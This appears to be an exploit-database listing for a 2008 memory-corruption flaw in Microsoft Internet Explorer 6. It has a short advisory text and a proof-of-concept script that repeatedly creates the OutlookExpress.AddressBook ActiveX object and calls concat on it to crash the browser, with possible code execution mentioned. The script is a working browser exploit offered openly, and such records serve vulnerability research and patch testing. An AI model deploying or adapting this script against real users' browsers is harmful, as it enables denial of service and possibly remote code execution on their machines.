Microsoft Internet Explorer 6 - New ActiveX Object String Concatenation Memory Corruption
| EKU-ID: 36980 | CVE: | OSVDB-ID: |
| Author: 0x000000 | Published: 2008-07-14 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 36980 | CVE: | OSVDB-ID: |
| Author: 0x000000 | Published: 2008-07-14 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/30219/info
Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.
Remote attackers can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
<script>
for(i=0;i<33;i++){
try{
foo = new ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3');
}catch(e){}
}
</script>